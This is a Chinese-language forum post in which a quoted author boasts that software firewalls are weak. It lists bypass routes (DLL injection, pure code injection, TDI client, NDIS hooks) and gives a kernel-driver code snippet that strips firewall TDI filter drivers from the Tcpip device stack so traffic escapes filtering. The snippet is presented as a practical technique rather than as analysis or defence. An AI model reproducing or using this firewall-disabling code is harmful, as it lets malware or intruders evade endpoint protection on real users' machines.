Quote:

此帖不允许再讨论杭州***论坛要求本文楼主黑他服务器一较高下的事情,根本属于无聊.....194楼以后讨论此话题的一概删除...希望大家多向楼主提问学习.....


所有的软件防火墙都很弱。如果不信的话您可以说出你认为非常强的防火墙，然后我再反驳，说出突破他的方法。关键还是使用者的安全意识和水平，否则再好的安全软件也无济于事。

附上一篇我前几天写的突破防火墙的文章：http://www.xyzreg.net
唉，软件防火墙好像没一个令我满意的，都比较弱，考虑不全。国内的防火墙更是令人心寒~ 无论是DLL注入还是不引入DLL的纯代码注入，还是TDI Cilent，都能把国内的防火墙搞定。NDIS hook 更不要说了..

来点好玩的，其实我们只要写个驱动，从设备栈里把防火墙的TDI过滤驱动给摘除掉，这样就能对付一般的防火墙了。当然，国外强一点的防火墙，比如ZoneAlarm Pro 6.5就得再结合其他方法了，嘿嘿。

摘除过滤驱动的代码片段：

RtlInitUnicodeString ( &TcpipName, L"\Driver\Tcpip" );

ObReferenceObjectByName( &TcpipName,
        OBJ_CASE_INSENSITIVE,
        NULL,
        0,
        *IoDriverObjectType,
        KernelMode,                  
        NULL,
        &TcpipDrvObj);

CurrentDevice = TcpipDrvObj->DeviceObject;

while(CurrentDevice != NULL )
{
CurrentDevice->AttachedDevice=0;
CurrentDevice = CurrentDevice->NextDevice;
}